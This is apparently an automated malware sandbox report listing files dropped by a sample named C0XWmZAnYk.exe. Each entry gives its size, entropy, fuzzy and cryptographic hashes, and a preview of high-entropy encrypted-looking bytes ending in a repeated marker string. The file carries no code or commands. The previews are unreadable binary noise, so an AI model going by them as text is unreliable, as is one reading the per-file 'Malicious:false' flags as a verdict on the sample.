              Preview:<?xml..........].XA.`...-...o.".8.=...x..pL...;...v..k,..x8...yX..c.z...L....]...#jE....j..P....?(j.....{3{.EX.u.......\..4.P..;.U......L.[......B,...^:...l..M....e`..o{..37:...gF.Cp..Y...3pw..6..B.3.@..>xyyW.K.....:....K..h....s{.x....!N.M..`.4.|]b..[_.7S..^b. $...xwO)....A..Y\.cQ).}..%..M.r..z.<..|.\d.>/v.....,..FB0 `..&..?1o.Ju....R...o..k.....Z..d(}CR.!#.r.Y.-U1..?QxE....$.g&.....7SVg ..$....[...X......N..'..h.....4....XO-y.9.Z.}......I...J*........j...Z,._..f............M...A..... ._NH.YB.@Q..<.Gz........./..);...a.[...cu.!:q!.....".v[.d".dG..u?..bE.>..w...lS....SY.(2....-....]....../(.]...2....e|J..C..`..0.b...4..n..h...F.4W.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.7109953034412495
              Encrypted:false
              SSDEEP:24:l9XMXiQIOiyNVqxkl39LWfSKJ3TX6AKd+bD:l9XXQIoN9w76N8D
              MD5:4E68134E6E11BA6B7C89AF31F2D89024
              SHA1:A2215BE2D2E973C4D65F477CF868D3125B9FA2D4
              SHA-256:DC84282F09002794DB20A93DA67767FCBE005337B9762C9E300CAA6BC1C528C8
              SHA-512:33E55C33A3AEC4CC723CA5C3A47A8111AC6030736B46B3CA74B384F8BEC40E719D0A2D89AA2B6B78FF09F2CFEB802918CB6BF534CCBB192758CF30588F0BBA16
              Malicious:false
              Preview:<?xml.Y.v....C:........YM.9...C..U.......p.v......?o..u....b.`.&....8..p...|..>@.@..n.%.d...F.:....]...M..........8....D.E.I.Z-...p6.czP..L..`..K.....WfM!.........^.[..U.....#.%O.....sF#vK..[.....\YI6.z)j..x..hi.4..@.9s ~(..H.-6. .%.W..m....../.:.... |!..........yy...n3...cd...iO.d..TW..f;:A..DDP.....9E......B~.....B......N..lt..h `r.o.......g.....&j<`^:.h...S..U.Yw.X..+.u.E...]VJ6').ED....).94....p..l.}...(.!..A....Z...5..c...~.?+.. .B.]%.w.....{......7...-..".<....v.....i..#){..G..1...Gz..`....[.:..K.+.D.z).+..t.<..*..k..('......7[3..O.....8|F.i."1.~...t..g.qxk..~K7..._.....c..A..q.(.r~t,}.E:9.~|..2l.#@z!&.i.NS....t.1'....B%]...M.q..|Dc.&..D._}..z...9..#O...y...P..dY..t_...^.#;.......o..T..Mb&[FP.e.]gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.667442497966525
              Encrypted:false
              SSDEEP:12:2R+O7IWa2OLvsWxQ5PivCMz1AVmD7K2FJcSMx9dK62qMyuVm3dxa3cii9a:2R+ga2OLv5CPiqMz1WmvrpG9g/qrAm3y
              MD5:D6E5CDF418880F0EE241E05864B7B95D
              SHA1:770554B7165A01375CB0F37D40366540BFD80B5A
              SHA-256:ED096F73881A54AA899F6346696314C35BE36CA206DE4F7820B084EFAE5A1268
              SHA-512:20B716EE3CD2608FFA775B29FAE376024568286C0835C56616C87A4520EA4F6EB9E1167CE80E42A98A96FBFFEB9AD22B44E2C18414F4169A0DAF1AABBC9494B4
              Malicious:false
              Preview:<?xml.......&b|...M...4F.G.t)......$...L.}p`BZ<?+.i.w..D.|+.j...bo@.. .C". ..A1.....i..J.y.?E./.....>........t...z{b..t.u.).2'.S...+.]N...[..o..f_.L..ZMMAi....wy..w....pa.u..R..Laq..n/.4+..t_Q.,;....t...A.?.Z....[...W]6........t...<..t.....L.......'.[.i).^y.(1..q.N...D.2....W.UL.N.I%j...sG..J*l~d....9}....Rwl>..:...t.,..\.H..*..Do._9I Fm.k...!..c .Y}A..Y.v8..........!m........Pz.....{...*h`..Y..`"`...%...H......L.p.z..=...c.vt..Q.z..(..l.H.8.z.F...L..R..-.N<....L..k..c..j8.r.E.`...k.w.pr`..]..]..l.2.G57.<yf.".9...w..KJH.bw....@.).7.*A..)\.gz..R`....C{.r......}.........2.,.............H..\X.!......r..7.'.....,s?..f...7......c...1kgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.731114763746927
              Encrypted:false
              SSDEEP:24:NmiKC7Dx6EhsTFJ1nRyiH61sCaKWdv+tIHCv+Pd+bD:0kSTFs9RYtV8D
              MD5:4B4762BDE323E5C05DC502D4497AFB44
              SHA1:2E54C81D9893D6F7E03AF9A81886135ADCB01D1F
              SHA-256:DEC9E2298C5E85183BB57E6DB82BC77369EA4E7A6746BA66ACD3C9823C8D26FB
              SHA-512:4FA50C84836985A57729B76AC9A80C09477BF08A725F8CD25F2AFAAE7793E7F1A325A64137FE25621AE279BD363B9C8429CF13F10029E160CC772A52D05ECFC2
              Malicious:false
              Preview:<?xml...&.R.....+.%.A....z..R........<.i....K......=Lh.J#F..Q..]a.h.D.3..S<.R.7}.....8>.(.{q(o........;.*<.].6?...V..=.U....kv.:..h.w..Tz=]G%...y....K?.&1..$.%.d....b.=..44......K.........d.!..D...w..n.U...#A..-...m#..f.}...dt.W.m.....PVh..A..,.ie...9......./m.!;...H.N..NGLu3.W..$....X\;v.....w5..@..=..?...*A.rc......B..C[.g\!s.....A...+.Nt.-...]...6...x%...S..\.d?....ppt.....^.!4...=..8....[..o.^._...#.-m...r4g..V....q.U..t|...3.E~.J .R.9&........!....%..}\.R].....y.M.....f.a35<.r...^...c~.zV].'.......T..w.d._]$..^..<5...zB...).s......C.&... \`.2.}.yzm.......p..z8. ..Cn..JR..VJ.....:..Z6?..........v.KXJ....1......r.r.=.EQ.......y.c..."..........}.....U..,.....A..S...+.hE...U e..?..!gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.702062668496879
              Encrypted:false
              SSDEEP:12:MJTbG60sVOLYj1e0TfPXzlOYVkeVBF5TMBoEbiqd/LuCjePbEKZcn2JLdxa3ciik:4n0S8Y5HTxOYH5TMaEmqdzuCyHaAd+bD
              MD5:19E9AB123F51D0792A4395C0DFCB6DC7
              SHA1:AFBBD949810E9051B9F59DB39D877B4BE3F5B6B9
              SHA-256:50F46372FB74F13770D76FAC5AE1ED8606CADB904EEAEAC18759374609725D9A
              SHA-512:1CBD2A5B7B67A78FD015D2B0F9698F5EB845A56D09CAC0FB53ACA687FF678E765C4C18C4B69298AB7D4AD1FE86FD9BB8F25EFB7FFB2F951F65A99DD36398CB6B
              Malicious:false
              Preview:<?xmlh]".t.!.\o....{.S..r6..&...(..e...B...&...WU..?2....Z..'......J........5...Z.@..U..kDor.....h....!.D..i.....9...].....^....'l....A.u.}....D.....4....^:....4..K..,._.............C......CZ..{V...g.P-.9.f.G...}..nU.P8..r.T..B..v.Z$6..]o.......7...xor.fV....7.LO.(..q...{....A`......L0q.?R.h....Q{|0.5.#.....gR......3...A...z.o...U..-.T.....jV*.s^..!.?........,.(T..\...n...............kY-.?%.v,.v....2!A#0'm..t.......=m..j..~.#"t..u.(./h.....*..u.M_mD.O...nT.P..&.f.....&.m...../...NN.^g^m...B1bO....+m..(`........P)a.....&]6H>..8.Wc7.O..X..Vskr...6.y{.V.KD;!.v.H%../.f..C.q...|.|.k...eC.o7...R`..........6.J..km`..6Z..;BP..)..p....3...K{lA,gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.7213860837046004
              Encrypted:false
              SSDEEP:24:i7WyHBAAee3XSjAQeXzUc2eQtBhSFd+bD:iyBeS0Qeh2ekzS/8D
              MD5:44A7AD7EFE87F001A470490AD2717265
              SHA1:E817A024BC2260EA2F0EF0FAD115BB71FD804E35
              SHA-256:E6D1F736E64053E1DC1768808A9DB583D0F8819818DA539434BB9DA79CAE68D7
              SHA-512:816E0F488A1719E14DE2B8BBA3FD001507F8F6EBBC8A7586AE49C8DD5B96C754663DA824A718B2FBB2435AAE18FE848EDE33D5612D477585EEA3A155AE8352D2
              Malicious:false
              Preview:<?xml..@o. 1.I.&T-....W.%._r.?..9...Hp...s...n#u2...wEU..%(p..G...Y..##V99.......[Q..t...o8..+.>.).5q)f..9....KA....m..K..P..!c..Dg.o...''.x.L.Pg&.....d.;4.....(f..3K.`..s..:W(.......he....k..b8..sdS.pi...=...F.l.B..H..\....i.3U4I..4z.......|=......a.._C.."....o.4^.C./@.f...z.,_.`.DM..+.p|O.)..e(...z..<\..(x.....l.k..{...hc....u..+oV._.;b.V.......m=...ka]....W...-....n.8..m..=v./.*[Q.?..!..j.......`........r..k......}p.h...`y.{.....h.....`.....I .[O.^t..m..w.%x......i...W...Sl..Do.9I.h\z..w..|.k......'...U.Q^.W...j..{..g=<.U......:%E...D...z].9^.5.u8.zv..D\2......{..I....Y.u+..|+.>.0y...*.M.0R..O......=...F4b....5tQ.V9.;.....m..boD...u.J.M.TV..`R.....c.....9=4.#.1.._...4......d].<.E...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.724224519051288
              Encrypted:false
              SSDEEP:12:4ZOUYfaVfv8Sv33Cv4TQY7W/WCII3v5Iw0j0S0dXndxa3cii9a:4wUYfaRv33nLmLt/5C4SYnd+bD
              MD5:0755B4055E20C62CF0D7A2851BAE3DF1
              SHA1:81AF4DC9EC0DF66CF5871C4AA1DBEC9D7971C852
              SHA-256:3EC525855773320F1E6F1112CAC23C755E2A7EC9698672175514A7E73B8BC559
              SHA-512:52A5EB5EB718457DC54CF785C9D5B00BA6B5BE9FB921F8F2EDE9A76727CF5606EB2AB28F76779AF36B86D1AEC22AE751538F4AEBD49AA5820F03395EC240CCCE
              Malicious:false
              Preview:<?xml......b.~......Iru(X6.({.7_)5.E..^../w.'n..I..VrjWo.a..]H#...x-E.;.Pp4...B...._..]...=&.f...B.+...Z...P..3..Y*.e...E.....{.^ .1..6.4.t. ......?9....~). ............d.p....5$....s.J.?...9...o.H.........G.i|..+QGw|4..Hf.nN..R.a.....7...!Wf.TC...d{..|C5_.@.c..".E....4.%.P......&.j....w..}.....\`B....I.[S$yT...ake.=#.K.A;...$...EW.....{..I_As@.....Q3._0.H..Wp.........{%._.q....><.1d..k.C&..L::>........ 0..T.g.V..'...'G..I...c..E.P.s...F.....P.p? ....$...:..l[./.....s..............A....6....;........r..U...;....n....W6...`...2..9..M.'?0....3... E.....n..\..1..{..........t.]"jLm....x..Br$7..,;....R.&...sA.?[....L.._...<....b"..dl..{gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.738014861906723
              Encrypted:false
              SSDEEP:24:3Oi7Dtyl2yis9vbtniEjxa5k9Vp5xS4d9t3jd+bD:3R5yrRZiEjx1Vp55v8D
              MD5:66BA47A3F804640E6F03637EC7BAC543
              SHA1:7A9E265069A464778EE1CE16F1AE5614CB6C649A
              SHA-256:8473B24A168337F889FC37F76892E4636AC5222B8EB65E67E7BA010A4C787263
              SHA-512:5D914F9B428924EFE2CB404D73AA240455FC05ED9FEC87797F1175F22329904EC2D6C060BB9A6181DA68029FD64D3EA1640A1CD396B262248E1D34866F04D9BA
              Malicious:false
              Preview:<?xmlG....?..V..w......~.j~....D3h..,.6....+.b...\|..&XIcJ.9-R..L';..j.....9.......4Hh.D.8..sn..:..OT".(.ogf.V....Q.?+..5.........^.....a.....Qz...m..B.5.1#.|.F..`z.{a.Q=...$.y'..X..7.........Li..C...<....Qt;....>.}.Q..v".....V.=.{..MC.....L...6`..0...`|..3~..t...i.Bxq...zTW.}{...@...=3<6/.!...P...g._...SD.00... ..We..8a.6DSP1....xt3..0Yy+....y.TMA.x.}..v........:*wQ.S.|,).B..Ya....v.....W.e.)a..*.v..GKj.H[....t....h.e.(Fr.%..=..gifCI!....j..B.h.....8..#.w7.3..........=.4..w.W.).....k.b+z.i..M{...*.u...G.[..U....}$M//.iy...Z........~%)..~.?..q...4.PM..`.S....)?.P.5........D..~...C..h.{..B.P...z...-..q.O.=......c|Wvv.9.\..Gt...p...<....dO...}e.]V.Yj...%....$N....]g..e..fut.S.(...h.g.r..+.?...`._..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.655598326881372
              Encrypted:false
              SSDEEP:12:hI1Hifs0WrKIOzZG62WebO8eDDlLN08eZaJtmUM5DuP2ie6FG4niAoil/atLdxan:hI1HOvIOk6LD5DDlJTeZaJtmxdie6F9/
              MD5:D358EA43F9928BF8599E754B7F251249
              SHA1:B12F76B61675DC5AB10FC16DAA6929A398253C68
              SHA-256:D4B9BB3F9B3233046C114CE247BD4B5C52DAB0C28921B0AF7B8B96B2CF3A00AC
              SHA-512:608B3BF264AA934717B8D2F2F127F9A5371818013065D627D1F63FADBCFD5882B590CCD5CE681E7DAC1D8FB193F3D4F95A9D4C4C3E7FD5AF2B8DE3E0F6D8928C
              Malicious:false
              Preview:<?xml.6.M.s_.....VU...:...r......<...4..%.d..y...m9........E...|A...._j.$_{..f.!9.j.Jso.6/..`g.......6...e.o.."......J.~HJ..Pi.........h...N|n....<(b.U?.m.JG....Tu:.+{.v2m....G?{@......{{...^.Y...l.Gd....{lq.G.W..)DK=......*.5.:.2.n.....V0........n9t^.Q.K.....=z.X7pDa~E....j...!.(3 .g.q>.@...4.e:.k..QK..V6..Q.?.I..2r?.q..2P&.Y0"Hh..J.Z..h..s.h...ka...H..9.?u.9.T......]....h.....~_.6.......B.....v...&!i.9..........)8..]M.l'.....*.UM......&%...t..`...j..t.4$.V.../$.0k,......4*G.X...*.(..q}..P..Sk.&.>..a?.i..b.>.B..$.~@Es...+pV!&...4.&.v........8+WY.....0i...o..Mi...onr...4....~....g-..t...F.....4..[.2...i]..s.h.._...I.......vuSN..FF~gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.7031514105848
              Encrypted:false
              SSDEEP:24:i/UUlKq7fpV3cZqg1FmekEMSvdn7PsHuG2pd+bD:i87qzpVMZqIPOSvdQHx2z8D
              MD5:2685A49592D1195C47E3FC8591F32877
              SHA1:78E2ED1C54C68E81449D858EFD083689C4AA1212
              SHA-256:64BD17DCAE7C7E8B5D10CD1165AEB94F20B7F450ACA7FC5463CF32D04919EB15
              SHA-512:D7271116D20DDEF6393B2950421EFE0784D044F97281525287FD48288238043C73D2042EAEF367ABD2FFE3E7559FDF4F04C6DCDFB1C57DD7C5C314BCBA28D135
              Malicious:false
              Preview:<?xml(..i|..G=...+....... ...Q...IY#. .KV....v.....pa.a...V.u......k..6).V\8...nz7.U.6.]l...........K......K......iK,..e'E...pC...1.Fe....x.|.:..\7B.R.S.n...b7..k.~a..'.........".2...a.GR.a...+...j..a.&..F4....K.n...yyn..C..l.H....F-.......z..E...A.Y2.r?...i.B).....,.6.i.a3IO...\....`........Tl.2.w.vh.qA*..j.5..C..d.E.'(.s.B...{JQ....'.-....1V...R..%.*....:f,F8r./.6L.".u..".R.C..~DQ\A..uh'.ke...A.)i.../...k.Y+.G.?...n...1...{k.`x.....kJ:!|Q.N.........N*....(5....vl..3=&..h...v._...D...md;.zd<..Bf........."Ni.3.,.:..."..~.#b..L.1....e...(R.'I.F...b.....hV .H..om..7.....a...I.M57%..Bo...>...9..<.w.6.z...)...O96.....#...#.Y6.i.,!.?TC.\.n.5./>^.w.....|......K.n.:..:o..AX.!.k\L..K~.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.766052835406674
              Encrypted:false
              SSDEEP:24:GyweCAOKVYCaZnewO8oi8yui+J0X3Rwd+bD:GC0K69ZnQiDSGm8D
              MD5:720FF2E3E4D7817DA877012C91B5DAEE
              SHA1:7EE3795BAED805094B6C47EB75CF8F471309BDED
              SHA-256:FF149C4DC37E4CC9E611D014A44698856A9AA1183438DCA98D1B1154F394B6F2
              SHA-512:06B211C281F86AB4BFA7CE1E432C7F37851CA7EBCEC7018A3F3EAA37D9568D6A24B604A5F6095B4B6D22A3B84E813B06CE68A574F67CA441BC04D8BEB1C97DCF
              Malicious:false
              Preview:<?xml2.f....L.....+....'.9.Q....o1.9&l....lA.._..I~~v..c....:^.&b.(}....j.....?.FV@.9?Z.2L4.Wv^.......<."C...........Y]G}.....z.NV...t.j.'..1.\*.......;.z.e|a.\N...=... @..M.9..C.p.)H.8...,!..z......m...p.-'.^...i...)PqB..Z........d.P..A....K[-X.....B.=..mhr.=Q%..gx,..>.O.X.......7.8....U...1.....9.....A....n.i._....=.A.......v.........WQ@..r)ic.8>..3../..iZ.d.."..M....\...b...h.@)IL.eu.#..I.?#.....%.=.9>.v..`.+.0.}.-....Qbc....c..K...................)0U.tX...d...y..A8.qD..v*5,R.NzW.6<. .q...t.g..U..[.z".NfZ....s.#.O...K.l.+........M..D.0....&.#5.}.p.g.66w.`..q.O/Yd}W..m."aN...".{.+.:..a.A.R.4$.V.........V....A.?h.AE..A.`.......-x".....=S...K.j.c*IHk..P..k..X...g....../.y'<gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.654213259729486
              Encrypted:false
              SSDEEP:12:uZIpmXWBjks69IPcF6VEBj5uO+vn49m9M8QU+3A80iYOOc1GSmsTIXgLdxa3ciik:uZkkgIAcF6VEBj+YUmHskISXIXgLd+bD
              MD5:80ABE299E7D0C8DB67162B97B0B9095C
              SHA1:71DDB4098498B462D893D7ABA0A8434B2BC1C3DE
              SHA-256:705EB315D296D2B56D9CC3964F398D15A2BE4C58161062136648CD8635F7F746
              SHA-512:ED91DC59C2F9E63E563950CF28584736EFA78217EC185BE6F243ACD4F12BEC12A46F7E6DF4BC586335BE9E1CE3E22EC0245B33036B2B3C4093B1DDE0CE45E7FA
              Malicious:false
              Preview:<?xml...R....._.o.6?>8.7Ju.I.7...,.zp...?.u<Po.....{..9.`.._..6.B..s...../%.t.C.\..l.....>.x..../..1)./.}p..B....-.k...O&Q.mz....4#....5....Ifu.........k.e~..Qai2..o.......v.\....d.j.o..1....._.l..&-...8...`S^....m.X.P...{.J..C..fN...5...Neu..e.gt^.O..7:..@..'.0=.......>.!.a..m.:.)..(h.....j..+...=.w:Q~K7o.!|..2?.4Q../..b.P.?.W.+w$)(....._dJ...~....}..0..N....*.?.P..*5.J.I..*.._7..l.a0Q..5..s. -..../...r.....4.u o2...R..3E._T ...P..I.....;..Ix.|.~4....D.y.~&F.z..-......R..5..>.>..4...M/NQ.N..q}...#j....~U*B.$C.....y#$.h.BRn>"..{..).........W^(..<....h......`..Z.M0.Q..H9..e...t.Q$I1.lk2P......_.7t..h.O./..ebbL..T.C~.....YHq....6H.BZ.n/-.....M.F..K.u.Kk....... k......gp9R.1L..N..4...j...... .p....MJ}J..r..NgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):744
              Entropy (8bit):7.705083400056457
              Encrypted:false
              SSDEEP:12:C7AW/uBi2QcUh4sKHp3j1/WD9lRCLFgzxwMWP7nxErnpd0CxNKz1sNGOKdxa3ciD:CEW/R2DUhmp3xWD9LCLmKBE0CXOlOKd4
              MD5:B581E7EDC44CC43A8C7FA0D034D378B7
              SHA1:AE22B5B663415D317982D70ED7DC210F36B30406
              SHA-256:DC08CCEE9B2A87580085144335FBD4548EAFBA61C906F8046593C5E5851E01D6
              SHA-512:4DB5757EB5947AE0D08333620A0542571E4A195B1CE821EFCC884555DDDFA9A8E69EB1E1BFFFAA6CD22A466703B5CF9EDE3FE418ADED8F2DCEF3D959124E5707
              Malicious:false
              Preview:<?xmlX.D..cz./..m)K...Ej.x...X.G.....m...8Z~........&p=..V...."].A.....t..?E. 5.2./~...'D....l....h...Y.=..fRdv......E>.....8..2..5..W.........y....i*CL..4g.....J]$...k..k...s..;a..@I...d..@..l.1..!.A.).....?.Oz...O..N.7B@.W..p..cI%.&.t..#P..z..:..*4`x.n...M.%..R...a.......v....tL#2......0..6}a..&+...l..../3..]Up.....'...S...u...b.P.L...H#3"V.....u..*. \op ..."f.+..X. |E.h..&DW.s.k/S.....NY........E...15.#.+).Q...J.k.."....5.bg..)K.7....M..`SI''.p.\d.&.p.E..+...,. ....U...;..%...{.M....NC..;jb..W...9....{.=.-....{.,a.x3H&.2.....`.x...mU....%s..5oiz.......(...])Q.......?.....e!.G\F?@eO...S.../.t..3..j.l{...F....H.p.I....8......+.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):803
              Entropy (8bit):7.688224605676968
              Encrypted:false
              SSDEEP:24:SoycpYRMKdMVwRMOqwiigJ47oQog2C0d+bD:SoycpYbd5GO6l2TL2v8D
              MD5:579EA0F419065FFB689B82317DB79937
              SHA1:14CCAAD5270ECF66ECAAB07A6025FC64ED230143
              SHA-256:F7F8D02DB4991B9807426AC4755CF07DAD6582102A23D1524EA37E7A210A11DB
              SHA-512:5B2BDD942B781D030AA0468A7984D2ECF870DD72E65216365D105E3C8C386DBA95B3210842DA203A52B9C1F38769633AF5515E3CACF20436E65254C7F634ABFE
              Malicious:false
              Preview:<?xmlLY.).H.....]..L..H2....6@=6...E........s..._.6q..?....'D..67...y..fg...m..46...+O.vc.P....be6~.75....4...._}v...B..r ....(D.........Y,..t...V.'.g....GgC...rl-%D...k$`.;2...9...*..L|...-._`..0....7..kL.7.Q....'.._L.p/..!.d......7.#..'....1.|."\...=n..2"AN.9..oj...5..u.8...i.t.....o..d ....y.Wd..5. ....3......S. .o....f.|.f..B....1.E.}...S....Y_|i...`..h.b....X.Z|.........R..m...q.X....&.(....tn...,&o.".4D..7.i'....Jpi.K4U?...a]=Q..rG.i.`|..b.......P.T.m`.@9..(.|A..S...>7E..!i......>...4.....=b..b...85.....T........1....q.1#..;.;.}H.i^|...1..#ng(..jZ.l...Zr....5..".d....-...r..3....Ou.B.B..:.......i.3.....!Y........J....>...'L."r.8>2..wc.K]%.d..V....h........_>.r.2yT.!.`.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.709247144501198
              Encrypted:false
              SSDEEP:12:udJ+ML2vkXeNJngleFpHhDhuk9RM9VqrX877oB8/G+0hFRzhVmMg2MRUOYosUvh+:ulCmwglehDhuOi9Vqjo7oMGzhFRjngZs
              MD5:02183CBDEA0E65BA5B79C87E18D6CA29
              SHA1:6FBB6B6421EEF49CFF28607BDFC2962FF559A648
              SHA-256:153B0776251AF5EF0B2A948B14A733421C08101E65FDDA8072363304BA63E835
              SHA-512:AA4F63734796C7C233AC5E7DCB8001B8CB5D3A667D8DC469A8C69FC0FA28837918A8660AA220FC284419FBB9B7BCBEDE1ECFCD3BAEFBDF918EB3E03345137D6E
              Malicious:false
              Preview:<?xml.I...U....4.E...p....g...^...2-..>`\mW..g.O..k..My;.X....6....5......|W.......]..J.F..\.....$...f2..+#............ {.^T. ..P4$...O.......u.}.v....Gi.5.|G`........|.GT!6../...+.VD....y.QG.^a....."E.{/w.0.eU..i.r...B....>.....x...CI...,`*......#..h%..:.+.^2.X..:0^.K.+k.H%D..+......9.....z........... _/.O(E.91VM...._.O..\[j...4.D.].%n.P....A.....";C.PT..V..4.^..l[...fp.;N..m...6.:.E..B.,..,}>....2^..,\V.d..8.....c..vR.$.g....G.W....G...J2.k;...}g.j.gj..Z.T....:*...E.'.p....5^cdp...~...+..>.h...I......._!q..n.v...c..........I...qdN...D..@bE3Z|.U..|.cp...P..;.v.vhV}(.....Von.qVG..n>.........q.?.Wb...h(fH..f.43o.9..+.F..x......$.Q.^......'....V...6CcN..PgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):835
              Entropy (8bit):7.7528739377967275
              Encrypted:false
              SSDEEP:24:4+RBwCXL0wk2V13GI/Vt4mjkJWvZqCd+bD:4+Uf2B/T4mjAWv58D
              MD5:645F361899749CB65BC92926454778BB
              SHA1:DB435325D6CA0F5DF8576DA1309AF0054764C91E
              SHA-256:21FA392E6011755A033B9066D41F8FA568E4191BF14B0004EE3D5335AF3D92FE
              SHA-512:A44227829E5D46F76273BEAAB0754F45672532D9CB0F8E23CDB1A354D19D57639D44B89E8164546B4EAC6AEE76C44ADD15C0A07E82E2D3DF599CCF62C4E900EA
              Malicious:false
              Preview:<?xml....".....D.a_.s..gQBz..&f.z!.F`.......c..W7P.....&0.I....b.L.x.......I.k.P.0.9...T......zm..e.b:....CJs...=........>^.+u..Z....*#Y..+.[.m./......;.J.......<.jtA]./.f.....e..N....~.1*.......@n,8+..I>.5%.9..."..I..}1..m....(Vk.<$...7.....g..sO..|).2/.r.9......e#.1......\...&~.Y...V_.I..?.{.X<......0)..et.....U...;{..1......s....;.[S..D..!..\..+..0.KG.D..t..@..i....-.......*6.t.._k.l.1M..y....Z./..R.. c.x..m...Qh....Z.....C?.z.a....1.i..p3zPc.=...P....+...)....^....m<.9...-ZTa.!O..y@l._..!$8:.......qI"...L.P.~|.7...V...3..9.D@&e...`B}Jz.=...r4.R..].../Jyk.kU.4..9.......<...\>O.......'.N......=..P2..f..c...].iL_..&.....bB......."..P.VA.*.l.0..a........c...a.{;......X...5:.Ny..C9...o..F...=.?...I. ...N........]gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.736012394703353
              Encrypted:false
              SSDEEP:12:JPJ0bnsWHnKIHnkak3UrwtdtslK/gIneHPTiAnD337aalWIhbtzzTHN0r9mSzrFO:JPYJkak3Ur4oZn77a09hzTHNc9mOFLd4
              MD5:A07D7DB5EDE924C53FEB935B973934A4
              SHA1:964106EB852B248C85F7E85A23CC75B0F4B206EF
              SHA-256:D56EDC05C57210742E5836EDE64356EC346681E75BDF22B5B2713302A147E847
              SHA-512:8E42147B7873F63A256BDD4F30E468B21C9F9123A6E012AB78E99D5E57FCABD1C1218287BF2D1E2AAFD1DD1F96EF143334EEDE93A6E4A5612D5A7EADB37F8590
              Malicious:false
              Preview:<?xml...`.w...9...v...Z....t..4...Y.V..O..).).^>.-.3.W....$..^0..?..^.........(v..N...!.Dpr.....l.K....Z."y....%..........'.....S....L..;3..:..w.2..A.I..t#4.!...F_..c.@..~o}.........G(4dQ.5.0...U{..!.uC.L.,*..Dg4%P..r...;G...Y1...V9.Aw/rs#.Z...<...qk(q.:.U...H....?.C.Vu..-..w.....6\.J.SU.J.Q..GN..n.E.....!2... 6...8..O.<...M...o.=..uV..(.......H!..w.....Q.s...F.....(muO..\...gD..^.;.%=......"S@.....u...n.s...O.W............fS..B.1.I.......C>#....nd.3.x...'{s..w..D...9_.i.j ...0..T.{[...U.A=roN..VzKy'1..KT<e:;N{i.7...a.@.5T0L5..McP..3..|~....t]|.m..N.sQ..+..#<.......R...V...[7D$...^.&_\...=.L<%3f.. ..P.Ea..kg..6:5..6gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.70589566176321
              Encrypted:false
              SSDEEP:24:NF4BvHjo+G8c05mkuY7QaBtQtR50kbJOrp43d+bD:NF0HjoeP8kuUnzkcet8D
